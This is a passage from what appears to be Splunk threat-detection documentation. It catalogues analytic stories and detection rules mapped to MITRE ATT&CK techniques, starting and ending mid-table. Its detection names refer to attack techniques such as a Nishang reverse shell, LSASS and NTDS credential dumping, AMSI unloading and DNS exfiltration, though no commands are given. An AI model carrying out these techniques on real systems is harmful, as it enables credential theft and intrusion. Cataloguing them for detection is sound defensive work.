
Remote Email Collection

Collection

Anomaly
Malicious PowerShell Process - Connect To Internet With Hidden Window

T1059.001, T1547.001

PowerShell, Registry Run Keys / Startup Folder

Execution, Persistence, Privilege Escalation

TTP
Malicious PowerShell Process - Execution Policy Bypass

T1059.001

PowerShell

Execution

TTP
Nishang PowershellTCPOneLine

T1059.001

PowerShell

Execution

TTP
Ntdsutil Export NTDS

T1003.003

NTDS

Credential Access

TTP
Set Default PowerShell Execution Policy To Unrestricted or Bypass

T1059.001

PowerShell

Execution

TTP
Unified Messaging Service Spawning a Process

T1190

Exploit Public-Facing Application

Initial Access

TTP
W3WP Spawning Shell

T1505.003

Web Shell

Persistence

TTP

Kill Chain Phase

  • Actions on Objectives
  • Command and Control
  • Execution
  • Exploitation
  • Installation
  • Lateral Movement


Reference


version: 1


Ingress tool transfer

Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Endpoint
  • Last Updated: 2021-03-24
  • Use Case: Advanced Threat Detection

Detection Profile

name ID Technique Tactic Type
Any Powershell DownloadFile

T1059.001, T1197, T1105, T1003, T1021, T1113, T1123, T1563, T1053, T1134, T1548, T1055, T1106, T1569, T1027, T1027.005, T1546.015, T1140, T1592, T1562

PowerShell, BITS Jobs, Ingress Tool Transfer, OS Credential Dumping, Remote Services, Screen Capture, Audio Capture, Remote Service Session Hijacking, Scheduled Task/Job, Access Token Manipulation, Abuse Elevation Control Mechanism, Process Injection, Native API, System Services, Obfuscated Files or Information, Indicator Removal from Tools, Component Object Model Hijacking, Deobfuscate/Decode Files or Information, Gather Victim Host Information, Impair Defenses

Execution, Defense Evasion, Persistence, Command And Control, Credential Access, Lateral Movement, Collection, Collection, Lateral Movement, Execution, Persistence, Privilege Escalation, Defense Evasion, Privilege Escalation, Privilege Escalation, Defense Evasion, Defense Evasion, Privilege Escalation, Execution, Execution, Defense Evasion, Defense Evasion, Privilege Escalation, Persistence, Defense Evasion, Reconnaissance, Defense Evasion

TTP
Any Powershell DownloadString

T1059.001, T1505.003, T1136.001, T1021.002, T1569.002, T1003.001, T1114.002, T1003.003, T1190

PowerShell, Web Shell, Local Account, SMB/Windows Admin Shares, Service Execution, LSASS Memory, Remote Email Collection, NTDS, Exploit Public-Facing Application

Execution, Persistence, Persistence, Lateral Movement, Execution, Credential Access, Collection, Credential Access, Initial Access

TTP
BITSAdmin Download File

T1197, T1105

BITS Jobs, Ingress Tool Transfer

Defense Evasion, Persistence, Command And Control

TTP
CertUtil Download With URLCache and Split Arguments

T1105

Ingress Tool Transfer

Command And Control

TTP
CertUtil Download With VerifyCtl and Split Arguments

T1105

Ingress Tool Transfer

Command And Control

TTP
Suspicious Curl Network Connection

T1105, T1543.001, T1074

Ingress Tool Transfer, Launch Agent, Data Staged

Command And Control, Persistence, Privilege Escalation, Collection

TTP

Kill Chain Phase

  • Actions on Objectives
  • Exploitation


Reference


version: 1


Lateral movement

Detect and investigate tactics, techniques, and procedures around how attackers move laterally within the enterprise. Because lateral movement can expose the adversary to detection, it should be an important focus for security analysts.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Endpoint, Network_Traffic
  • Last Updated: 2020-02-04
  • Use Case: Advanced Threat Detection

Detection Profile

name ID Technique Tactic Type
Detect Activity Related to Pass the Hash Attacks

T1550.002, T1021.002, T1569.002, T1558.003, T1021.001, T1053.005

Pass the Hash, SMB/Windows Admin Shares, Service Execution, Kerberoasting, Remote Desktop Protocol, Scheduled Task

Defense Evasion, Lateral Movement, Lateral Movement, Execution, Credential Access, Lateral Movement, Execution, Persistence, Privilege Escalation

TTP
Detect Pass the Hash

T1550.002

Pass the Hash

Defense Evasion, Lateral Movement

TTP
Detect PsExec With accepteula Flag

T1021.002

SMB/Windows Admin Shares

Lateral Movement

TTP
Detect Renamed PSExec

T1569.002

Service Execution

Execution

Hunting
Kerberoasting spn request with RC4 encryption

T1558.003

Kerberoasting

Credential Access

TTP
Potential Pass the Token or Hash Observed at the Destination Device

T1550.002

Pass the Hash

Defense Evasion, Lateral Movement

TTP
Potential Pass the Token or Hash Observed by an Event Collecting Device

T1550.002

Pass the Hash

Defense Evasion, Lateral Movement

TTP
Remote Desktop Network Traffic

T1021.001

Remote Desktop Protocol

Lateral Movement

Anomaly
Remote Desktop Process Running On System

T1021.001

Remote Desktop Protocol

Lateral Movement

Hunting
Schtasks scheduling job on remote system

T1053.005

Scheduled Task

Execution, Persistence, Privilege Escalation

TTP

Kill Chain Phase

  • Actions on Objectives
  • Execution
  • Exploitation
  • Lateral Movement


Reference


version: 2


Malicious powershell

Attackers are finding stealthy ways "live off the land," leveraging utilities and tools that come standard on the endpoint--such as PowerShell--to achieve their goals without downloading binary files. These searches can help you detect and investigate PowerShell command-line options that may be indicative of malicious intent.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Endpoint
  • Last Updated: 2017-08-23
  • Use Case: Advanced Threat Detection

Detection Profile

name ID Technique Tactic Type
Any Powershell DownloadFile

T1059.001, T1197, T1105, T1003, T1021, T1113, T1123, T1563, T1053, T1134, T1548, T1055, T1106, T1569, T1027, T1027.005, T1546.015, T1140, T1592, T1562

PowerShell, BITS Jobs, Ingress Tool Transfer, OS Credential Dumping, Remote Services, Screen Capture, Audio Capture, Remote Service Session Hijacking, Scheduled Task/Job, Access Token Manipulation, Abuse Elevation Control Mechanism, Process Injection, Native API, System Services, Obfuscated Files or Information, Indicator Removal from Tools, Component Object Model Hijacking, Deobfuscate/Decode Files or Information, Gather Victim Host Information, Impair Defenses

Execution, Defense Evasion, Persistence, Command And Control, Credential Access, Lateral Movement, Collection, Collection, Lateral Movement, Execution, Persistence, Privilege Escalation, Defense Evasion, Privilege Escalation, Privilege Escalation, Defense Evasion, Defense Evasion, Privilege Escalation, Execution, Execution, Defense Evasion, Defense Evasion, Privilege Escalation, Persistence, Defense Evasion, Reconnaissance, Defense Evasion

TTP
Any Powershell DownloadString

T1059.001, T1505.003, T1136.001, T1021.002, T1569.002, T1003.001, T1114.002, T1003.003, T1190

PowerShell, Web Shell, Local Account, SMB/Windows Admin Shares, Service Execution, LSASS Memory, Remote Email Collection, NTDS, Exploit Public-Facing Application

Execution, Persistence, Persistence, Lateral Movement, Execution, Credential Access, Collection, Credential Access, Initial Access

TTP
Credential Extraction indicative of use of DSInternals credential conversion modules

T1003

OS Credential Dumping

Credential Access

TTP
Credential Extraction indicative of use of DSInternals modules

T1003

OS Credential Dumping

Credential Access

TTP
Credential Extraction indicative of use of PowerSploit modules

T1003

OS Credential Dumping

Credential Access

TTP
Credential Extraction via Get-ADDBAccount module present in PowerSploit and DSInternals

T1003

OS Credential Dumping

Credential Access

TTP
Detect Empire with PowerShell Script Block Logging

T1059.001

PowerShell

Execution

TTP
Detect Mimikatz With PowerShell Script Block Logging

T1003

OS Credential Dumping

Credential Access

TTP
Illegal Access To User Content via PowerSploit modules

T1021, T1113, T1123, T1563

Remote Services, Screen Capture, Audio Capture, Remote Service Session Hijacking

Lateral Movement, Collection, Collection, Lateral Movement

TTP
Illegal Privilege Elevation and Persistence via PowerSploit modules

T1053, T1134, T1548

Scheduled Task/Job, Access Token Manipulation, Abuse Elevation Control Mechanism

Execution, Persistence, Privilege Escalation, Defense Evasion, Privilege Escalation, Privilege Escalation, Defense Evasion

TTP
Illegal Service and Process Control via PowerSploit modules

T1055, T1106, T1569

Process Injection, Native API, System Services

Defense Evasion, Privilege Escalation, Execution, Execution

TTP
Malicious PowerShell Process - Connect To Internet With Hidden Window

T1059.001, T1547.001

PowerShell, Registry Run Keys / Startup Folder

Execution, Persistence, Privilege Escalation

TTP
Malicious PowerShell Process - Encoded Command

T1027

Obfuscated Files or Information

Defense Evasion

Hunting
Malicious PowerShell Process With Obfuscation Techniques

T1059.001

PowerShell

Execution

TTP
PowerShell 4104 Hunting

T1059.001

PowerShell

Execution

Hunting
PowerShell Domain Enumeration

T1059.001

PowerShell

Execution

TTP
PowerShell Loading DotNET into Memory via System Reflection Assembly

T1059.001

PowerShell

Execution

TTP
Powershell Creating Thread Mutex

T1027.005

Indicator Removal from Tools

Defense Evasion

TTP
Powershell Enable SMB1Protocol Feature

T1027.005

Indicator Removal from Tools

Defense Evasion

TTP
Powershell Execute COM Object

T1546.015

Component Object Model Hijacking

Privilege Escalation, Persistence

TTP
Powershell Fileless Process Injection via GetProcAddress

T1055, T1059.001

Process Injection, PowerShell

Defense Evasion, Privilege Escalation, Execution

TTP
Powershell Fileless Script Contains Base64 Encoded Content

T1027, T1059.001

Obfuscated Files or Information, PowerShell

Defense Evasion, Execution

TTP
Powershell Processing Stream Of Data

T1059.001

PowerShell

Execution

TTP
Powershell Using memory As Backing Store

T1140

Deobfuscate/Decode Files or Information

Defense Evasion

TTP
Recon AVProduct Through Pwh or WMI

T1592

Gather Victim Host Information

Reconnaissance

TTP
Recon Using WMI Class

T1592

Gather Victim Host Information

Reconnaissance

TTP
Set Default PowerShell Execution Policy To Unrestricted or Bypass

T1059.001

PowerShell

Execution

TTP
Unloading AMSI via Reflection

T1562

Impair Defenses

Defense Evasion

TTP
WMI Recon Running Process Or Services

T1592

Gather Victim Host Information

Reconnaissance

TTP

Kill Chain Phase

  • Actions on Objectives
  • Command and Control
  • Exploitation
  • Installation
  • Privilege Escalation
  • Reconnaissance


Reference


version: 5


Masquerading - rename system utilities

Adversaries may rename legitimate system utilities to try to evade security mechanisms concerning the usage of those utilities.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Endpoint
  • Last Updated: 2021-04-26
  • Use Case: Advanced Threat Detection

Detection Profile

name ID Technique Tactic Type
Execution of File with Multiple Extensions

T1036.003, T1127.001, T1218.011, T1127, T1036

Rename System Utilities, MSBuild, Rundll32, Trusted Developer Utilities Proxy Execution, Masquerading

Defense Evasion, Defense Evasion, Defense Evasion, Defense Evasion, Defense Evasion

TTP
Suspicious MSBuild Rename

T1127.001, T1036.003

MSBuild, Rename System Utilities

Defense Evasion, Defense Evasion

TTP
Suspicious Rundll32 Rename

T1218.011, T1036.003

Rundll32, Rename System Utilities

Defense Evasion, Defense Evasion

Hunting
Suspicious microsoft workflow compiler rename

T1127, T1036.003

Trusted Developer Utilities Proxy Execution, Rename System Utilities

Defense Evasion, Defense Evasion

Hunting
Suspicious msbuild path

T1127.001, T1036.003

MSBuild, Rename System Utilities

Defense Evasion, Defense Evasion

TTP
System Process Running from Unexpected Location

T1036

Masquerading

Defense Evasion

Anomaly
System Processes Run From Unexpected Locations

T1036.003

Rename System Utilities

Defense Evasion

TTP

Kill Chain Phase

  • Actions on Objectives
  • Exploitation


Reference


version: 1


Meterpreter

Meterpreter provides red teams, pen testers and threat actors interactive access to a compromised host to run commands, upload payloads, download files, and other actions.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Endpoint
  • Last Updated: 2021-06-08
  • Use Case: Advanced Threat Detection

Microsoft mshtml remote code execution cve-2021-40444

CVE-2021-40444 is a remote code execution vulnerability in MSHTML, recently used to delivery targeted spearphishing documents.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Endpoint
  • Last Updated: 2021-09-08
  • Use Case: Advanced Threat Detection

Detection Profile

name ID Technique Tactic Type
Control Loading from World Writable Directory

T1218.002, T1566.001, T1218.011

Control Panel, Spearphishing Attachment, Rundll32

Defense Evasion, Initial Access, Defense Evasion

TTP
MSHTML Module Load in Office Product

T1566.001

Spearphishing Attachment

Initial Access

TTP
Office Product Writing cab or inf

T1566.001

Spearphishing Attachment

Initial Access

TTP
Office Spawning Control

T1566.001

Spearphishing Attachment

Initial Access

TTP
Rundll32 Control RunDLL Hunt

T1218.011

Rundll32

Defense Evasion

Hunting
Rundll32 Control RunDLL World Writable Directory

T1218.011

Rundll32

Defense Evasion

TTP

Kill Chain Phase

  • Exploitation


Reference


version: 1


Nobelium group

Sunburst is a trojanized updates to SolarWinds Orion IT monitoring and management software. It was discovered by FireEye in December 2020. The actors behind this campaign gained access to numerous public and private organizations around the world.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Endpoint, Network_Traffic, Web
  • Last Updated: 2020-12-14
  • Use Case: Advanced Threat Detection

Detection Profile

name ID Technique Tactic Type
Anomalous usage of 7zip

T1560.001, T1059.003, T1543.003, T1055, T1071.002, T1218.010, T1218.005, T1569.002, T1027, T1218.011, T1053.005, T1548, T1203, T1505.003, T1127.001, T1036.003, T1127, T1071.001, T1018

Archive via Utility, Windows Command Shell, Windows Service, Process Injection, File Transfer Protocols, Regsvr32, Mshta, Service Execution, Obfuscated Files or Information, Rundll32, Scheduled Task, Abuse Elevation Control Mechanism, Exploitation for Client Execution, Web Shell, MSBuild, Rename System Utilities, Trusted Developer Utilities Proxy Execution, Web Protocols, Remote System Discovery

Collection, Execution, Persistence, Privilege Escalation, Defense Evasion, Privilege Escalation, Command And Control, Defense Evasion, Defense Evasion, Execution, Defense Evasion, Defense Evasion, Execution, Persistence, Privilege Escalation, Privilege Escalation, Defense Evasion, Execution, Persistence, Defense Evasion, Defense Evasion, Defense Evasion, Command And Control, Discovery

Anomaly
Detect Outbound SMB Traffic

T1071.002

File Transfer Protocols

Command And Control

TTP
Detect Prohibited Applications Spawning cmd exe

T1059.003, T1059, T1068, T1036.003

Windows Command Shell, Command and Scripting Interpreter, Exploitation for Privilege Escalation, Rename System Utilities

Execution, Execution, Privilege Escalation, Defense Evasion

Hunting
Detect Rundll32 Inline HTA Execution

T1218.005

Mshta

Defense Evasion

TTP
First Time Seen Running Windows Service

T1569.002, T1055, T1106, T1569, T1574.011, T1543.003

Service Execution, Process Injection, Native API, System Services, Services Registry Permissions Weakness, Windows Service

Execution, Defense Evasion, Privilege Escalation, Execution, Execution, Persistence, Privilege Escalation, Defense Evasion, Persistence, Privilege Escalation

Anomaly
Malicious PowerShell Process - Encoded Command

T1027

Obfuscated Files or Information

Defense Evasion

Hunting
Sc exe Manipulating Windows Services

T1543.003

Windows Service

Persistence, Privilege Escalation

TTP
Scheduled Task Deleted Or Created via CMD

T1053.005

Scheduled Task

Execution, Persistence, Privilege Escalation

TTP
Schtasks scheduling job on remote system

T1053.005

Scheduled Task

Execution, Persistence, Privilege Escalation

TTP
Sunburst Correlation DLL and Network Event

T1203

Exploitation for Client Execution

Execution

TTP
Supernova Webshell

T1505.003

Web Shell

Persistence

TTP
TOR Traffic

T1071.001

Web Protocols

Command And Control

TTP
Windows AdFind Exe

T1018

Remote System Discovery

Discovery

TTP

Kill Chain Phase

  • Actions on Objective
  • Actions on Objectives
  • Command and Control
  • Exfiltration
  • Exploitation
  • Installation


Reference


version: 2


Petitpotam ntlm relay on active directory certificate services

PetitPotam (CVE-2021-36942,) is a vulnerablity identified in Microsofts EFSRPC Protocol that can allow an unauthenticated account to escalate privileges to domain administrator given the right circumstances.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • Last Updated: 2021-08-31
  • Use Case: Advanced Threat Detection

Possible backdoor activity associated with mudcarp espionage campaigns

Monitor your environment for suspicious behaviors that resemble the techniques employed by the MUDCARP threat group.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Endpoint
  • Last Updated: 2020-01-22
  • Use Case: Advanced Threat Detection

Detection Profile

name ID Technique Tactic Type
Malicious PowerShell Process - Connect To Internet With Hidden Window

T1059.001, T1547.001

PowerShell, Registry Run Keys / Startup Folder

Execution, Persistence, Privilege Escalation

TTP
Registry Keys Used For Persistence

T1547.001

Registry Run Keys / Startup Folder

Persistence, Privilege Escalation

TTP
Unusually Long Command Line Anomaly
Unusually Long Command Line - MLTK Anomaly

Kill Chain Phase

  • Actions on Objectives
  • Command and Control


Reference


version: 1


Proxyshell

ProxyShell is a chain of exploits targeting on-premise Microsoft Exchange Server - CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Endpoint
  • Last Updated: 2021-08-24
  • Use Case: Advanced Threat Detection

Sql injection

Use the searches in this Analytic Story to help you detect structured query language (SQL) injection attempts characterized by long URLs that contain malicious parameters.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Web
  • Last Updated: 2017-09-19
  • Use Case: Advanced Threat Detection

Detection Profile

name ID Technique Tactic Type
SQL Injection with Long URLs

T1190

Exploit Public-Facing Application

Initial Access

TTP

Kill Chain Phase

  • Delivery


Reference


version: 1


Silver sparrow

Silver Sparrow, identified by Red Canary Intelligence, is a new forward looking MacOS (Intel and M1) malicious software downloader utilizing JavaScript for execution and a launchAgent to establish persistence.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Endpoint
  • Last Updated: 2021-02-24
  • Use Case: Advanced Threat Detection

Detection Profile

name ID Technique Tactic Type
Suspicious Curl Network Connection

T1105, T1543.001, T1074

Ingress Tool Transfer, Launch Agent, Data Staged

Command And Control, Persistence, Privilege Escalation, Collection

TTP
Suspicious PlistBuddy Usage

T1543.001

Launch Agent

Persistence, Privilege Escalation

TTP
Suspicious PlistBuddy Usage via OSquery

T1543.001

Launch Agent

Persistence, Privilege Escalation

TTP
Suspicious SQLite3 LSQuarantine Behavior

T1074

Data Staged

Collection

TTP

Kill Chain Phase

  • Actions on Objectives


Reference


version: 1


Spearphishing attachments

Detect signs of malicious payloads that may indicate that your environment has been breached via a phishing attack.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Endpoint
  • Last Updated: 2019-04-29
  • Use Case: Advanced Threat Detection

Detection Profile

name ID Technique Tactic Type
Detect Outlook exe writing a zip file

T1566.001, T1003.002, T1566.002

Spearphishing Attachment, Security Account Manager, Spearphishing Link

Initial Access, Credential Access, Initial Access

TTP
Excel Spawning PowerShell

T1003.002

Security Account Manager

Credential Access

TTP
Excel Spawning Windows Script Host

T1003.002

Security Account Manager

Credential Access

TTP
MSHTML Module Load in Office Product

T1566.001

Spearphishing Attachment

Initial Access

TTP
Office Application Spawn rundll32 process

T1566.001

Spearphishing Attachment

Initial Access

TTP
Office Document Creating Schedule Task

T1566.001

Spearphishing Attachment

Initial Access

TTP
Office Document Executing Macro Code

T1566.001

Spearphishing Attachment

Initial Access

TTP
Office Document Spawned Child Process To Download

T1566.001

Spearphishing Attachment

Initial Access

TTP
Office Product Spawning BITSAdmin

T1566.001

Spearphishing Attachment

Initial Access

TTP
Office Product Spawning CertUtil

T1566.001

Spearphishing Attachment

Initial Access

TTP
Office Product Spawning MSHTA

T1566.001

Spearphishing Attachment

Initial Access

TTP
Office Product Spawning Rundll32 with no DLL

T1566.001

Spearphishing Attachment

Initial Access

TTP
Office Product Spawning Wmic

T1566.001

Spearphishing Attachment

Initial Access

TTP
Office Product Writing cab or inf

T1566.001

Spearphishing Attachment

Initial Access

TTP
Office Spawning Control

T1566.001

Spearphishing Attachment

Initial Access

TTP
Process Creating LNK file in Suspicious Location

T1566.002

Spearphishing Link

Initial Access

TTP
Winword Spawning Cmd

T1566.001

Spearphishing Attachment

Initial Access

TTP
Winword Spawning PowerShell

T1566.001

Spearphishing Attachment

Initial Access

TTP

Kill Chain Phase

  • Actions on Objectives
  • Exploitation
  • Installation


Reference


version: 1


Suspicious command-line executions

Leveraging the Windows command-line interface (CLI) is one of the most common attack techniques--one that is also detailed in the MITRE ATT&CK framework. Use this Analytic Story to help you identify unusual or suspicious use of the CLI on Windows systems.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Endpoint
  • Last Updated: 2020-02-03
  • Use Case: Advanced Threat Detection

Detection Profile

name ID Technique Tactic Type
Detect Prohibited Applications Spawning cmd exe

T1059.003, T1059, T1068, T1036.003

Windows Command Shell, Command and Scripting Interpreter, Exploitation for Privilege Escalation, Rename System Utilities

Execution, Execution, Privilege Escalation, Defense Evasion

Hunting
Detect Prohibited Applications Spawning cmd exe

T1059

Command and Scripting Interpreter

Execution

TTP
Detect Use of cmd exe to Launch Script Interpreters

T1059.003, T1072, T1547.001, T1021.002, T1566.001

Windows Command Shell, Software Deployment Tools, Registry Run Keys / Startup Folder, SMB/Windows Admin Shares, Spearphishing Attachment

Execution, Execution, Lateral Movement, Persistence, Privilege Escalation, Lateral Movement, Initial Access

TTP
System Processes Run From Unexpected Locations

T1036.003

Rename System Utilities

Defense Evasion

TTP
Unusually Long Command Line Anomaly
Unusually Long Command Line - MLTK Anomaly

Kill Chain Phase

  • Actions on Objectives
  • Exploitation


Reference


version: 2


Suspicious compiled html activity

Monitor and detect techniques used by attackers who leverage the mshta.exe process to execute malicious code.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Endpoint
  • Last Updated: 2021-02-11
  • Use Case: Advanced Threat Detection

Detection Profile

name ID Technique Tactic Type
Detect HTML Help Renamed

T1218.001

Compiled HTML File

Defense Evasion

Hunting
Detect HTML Help Spawn Child Process

T1218.001

Compiled HTML File

Defense Evasion

TTP
Detect HTML Help URL in Command Line

T1218.001

Compiled HTML File

Defense Evasion

TTP
Detect HTML Help Using InfoTech Storage Handlers

T1218.001

Compiled HTML File

Defense Evasion

TTP

Kill Chain Phase

  • Actions on Objectives


Reference


version: 1


Suspicious dns traffic

Attackers often attempt to hide within or otherwise abuse the domain name system (DNS). You can thwart attempts to manipulate this omnipresent protocol by monitoring for these types of abuses.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Endpoint, Network_Resolution
  • Last Updated: 2017-09-18
  • Use Case: Advanced Threat Detection

Detection Profile

name ID Technique Tactic Type
DNS Exfiltration Using Nslookup App

T1048, T1071.004, T1048.003, T1095, T1041, T1189, T1537, T1114.001, T1114, T1114.003, T1071.001

Exfiltration Over Alternative Protocol, DNS, Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol, Non-Application Layer Protocol, Exfiltration Over C2 Channel, Drive-by Compromise, Transfer Data to Cloud Account, Local Email Collection, Email Collection, Email Forwarding Rule, Web Protocols

Exfiltration, Command And Control, Exfiltration, Command And Control, Exfiltration, Initial Access, Exfiltration, Collection, Collection, Collection, Command And Control

TTP
DNS Query Length Outliers - MLTK

T1071.004

DNS

Command And Control

Anomaly
DNS Query Length With High Standard Deviation

T1048.003

Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol

Exfiltration

Anomaly
Detect hosts connecting to dynamic domain providers

T1189

Drive-by Compromise

Initial Access

TTP
Excessive DNS Failures

T1071.004

DNS

Command And Control

Anomaly
Excessive Usage of NSLOOKUP App

T1048

Exfiltration Over Alternative Protocol

Exfiltration

Anomaly

Kill Chain Phase

  • Actions on Objectives
  • Command and Control
  • Exploitation


Reference


version: 1


Suspicious emails

Email remains one of the primary means for attackers to gain an initial foothold within the modern enterprise. Detect and investigate suspicious emails in your environment with the help of the searches in this Analytic Story.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Email
  • Last Updated: 2020-01-27
  • Use Case: Advanced Threat Detection

Detection Profile

name ID Technique Tactic Type
Email Attachments With Lots Of Spaces Anomaly
Monitor Email For Brand Abuse TTP
Suspicious Email Attachment Extensions

T1566.001

Spearphishing Attachment

Initial Access

Anomaly

Kill Chain Phase

  • Delivery


Reference


version: 1


Suspicious mshta activity

Monitor and detect techniques used by attackers who leverage the mshta.exe process to execute malicious code.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Endpoint
  • Last Updated: 2021-01-20
  • Use Case: Advanced Threat Detection

Detection Profile

name ID Technique Tactic Type
Detect MSHTA Url in Command Line

T1218.005, T1059.003, T1059, T1547.001

Mshta, Windows Command Shell, Command and Scripting Interpreter, Registry Run Keys / Startup Folder

Defense Evasion, Execution, Execution, Persistence, Privilege Escalation

TTP
Detect Prohibited Applications Spawning cmd exe

T1059.003, T1059, T1068, T1036.003

Windows Command Shell, Command and Scripting Interpreter, Exploitation for Privilege Escalation, Rename System Utilities

Execution, Execution, Privilege Escalation, Defense Evasion

Hunting
Detect Prohibited Applications Spawning cmd exe

T1059

Command and Scripting Interpreter

Execution

TTP
Detect Rundll32 Inline HTA Execution

T1218.005

Mshta

Defense Evasion

TTP
Detect mshta inline hta execution

T1218.005

Mshta

Defense Evasion

TTP
Detect mshta renamed

T1218.005

Mshta

Defense Evasion

Hunting
Registry Keys Used For Persistence

T1547.001

Registry Run Keys / Startup Folder

Persistence, Privilege Escalation

TTP
Suspicious mshta child process

T1218.005

Mshta

Defense Evasion

TTP
Suspicious mshta spawn

T1218.005

Mshta

Defense Evasion

TTP

Kill Chain Phase

  • Actions on Objectives
  • Exploitation


Reference


version: 2


Suspicious okta activity

Monitor your Okta environment for suspicious activities. Due to the Covid outbreak, many users are migrating over to leverage cloud services more and more. Okta is a popular tool to manage multiple users and the web-based applications they need to stay productive. The searches in this story will help monitor your Okta environment for suspicious activities and associated user behaviors.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • Last Updated: 2020-04-02
  • Use Case: Security Monitoring

Detection Profile

name ID Technique Tactic Type
Multiple Okta Users With Invalid Credentials From The Same IP

T1078.001

Default Accounts

Defense Evasion, Persistence, Privilege Escalation, Initial Access

TTP
Okta Account Lockout Events

T1078.001

Default Accounts

Defense Evasion, Persistence, Privilege Escalation, Initial Access

Anomaly
Okta Failed SSO Attempts

T1078.001

Default Accounts

Defense Evasion, Persistence, Privilege Escalation, Initial Access

Anomaly
Okta User Logins From Multiple Cities

T1078.001

Default Accounts

Defense Evasion, Persistence, Privilege Escalation, Initial Access

Anomaly

Kill Chain Phase

Reference


version: 1


Suspicious regsvcs regasm activity

Monitor and detect techniques used by attackers who leverage the mshta.exe process to execute malicious code.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Endpoint
  • Last Updated: 2021-02-11
  • Use Case: Advanced Threat Detection

Suspicious regsvr32 activity

Monitor and detect techniques used by attackers who leverage the regsvr32.exe process to execute malicious code.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Endpoint
  • Last Updated: 2021-01-29
  • Use Case: Advanced Threat Detection

Suspicious rundll32 activity

Monitor and detect techniques used by attackers who leverage rundll32.exe to execute arbitrary malicious code.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Endpoint
  • Last Updated: 2021-02-03
  • Use Case: Advanced Threat Detection

Detection Profile

name ID Technique Tactic Type
Detect Rundll32 Application Control Bypass - advpack

T1218.011, T1003.001, T1036.003

Rundll32, LSASS Memory, Rename System Utilities

Defense Evasion, Credential Access, Defense Evasion

TTP
Detect Rundll32 Application Control Bypass - setupapi

T1218.011

Rundll32

Defense Evasion

TTP
Detect Rundll32 Application Control Bypass - syssetup

T1218.011

Rundll32

Defense Evasion

TTP
Dump LSASS via comsvcs DLL

T1003.001

LSASS Memory

Credential Access

TTP
Rundll32 Control RunDLL Hunt

T1218.011

Rundll32

Defense Evasion

Hunting
Rundll32 Control RunDLL World Writable Directory

T1218.011

Rundll32

Defense Evasion

TTP
Rundll32 with no Command Line Arguments with Network

T1218.011

Rundll32

Defense Evasion

TTP
Suspicious Rundll32 Rename

T1218.011, T1036.003

Rundll32, Rename System Utilities

Defense Evasion, Defense Evasion

Hunting
Suspicious Rundll32 StartW

T1218.011

Rundll32

Defense Evasion

TTP
Suspicious Rundll32 dllregisterserver

T1218.011

Rundll32

Defense Evasion

TTP
Suspicious Rundll32 no Command Line Arguments

T1218.011

Rundll32

Defense Evasion

TTP

Kill Chain Phase

  • Actions on Objectives
  • Exploitation


Reference


version: 1


Suspicious wmi use

Attackers are increasingly abusing Windows Management Instrumentation (WMI), a framework and associated utilities available on all modern Windows operating systems. Because WMI can be leveraged to manage both local and remote systems, it is important to identify the processes executed and the user context within which the activity occurred.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Endpoint
  • Last Updated: 2018-10-23
  • Use Case: Advanced Threat Detection

Detection Profile

name ID Technique Tactic Type
Detect WMI Event Subscription Persistence

T1546.003, T1047

Windows Management Instrumentation Event Subscription, Windows Management Instrumentation

Privilege Escalation, Persistence, Execution

TTP
Process Execution via WMI

T1047

Windows Management Instrumentation

Execution

TTP
Remote Process Instantiation via WMI

T1047

Windows Management Instrumentation

Execution

TTP
Remote WMI Command Attempt

T1047

Windows Management Instrumentation

Execution

TTP
Script Execution via WMI

T1047

Windows Management Instrumentation

Execution

TTP
WMI Permanent Event Subscription

T1047

Windows Management Instrumentation

Execution

TTP
WMI Permanent Event Subscription - Sysmon

T1546.003

Windows Management Instrumentation Event Subscription

Privilege Escalation, Persistence

TTP
WMI Temporary Event Subscription

T1047

Windows Management Instrumentation

Execution

TTP

Kill Chain Phase

  • Actions on Objectives
  • Exploitation


Reference


version: 2


Suspicious windows registry activities

Monitor and detect registry changes initiated from remote locations, which can be a sign that an attacker has infiltrated your system.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Endpoint
  • Last Updated: 2018-05-31
  • Use Case: Advanced Threat Detection

Detection Profile

name ID Technique Tactic Type
Disabling Remote User Account Control

T1548.002, T1036, T1547.010, T1070, T1547.001, T1546.012, T1546.011, T1113, T1543

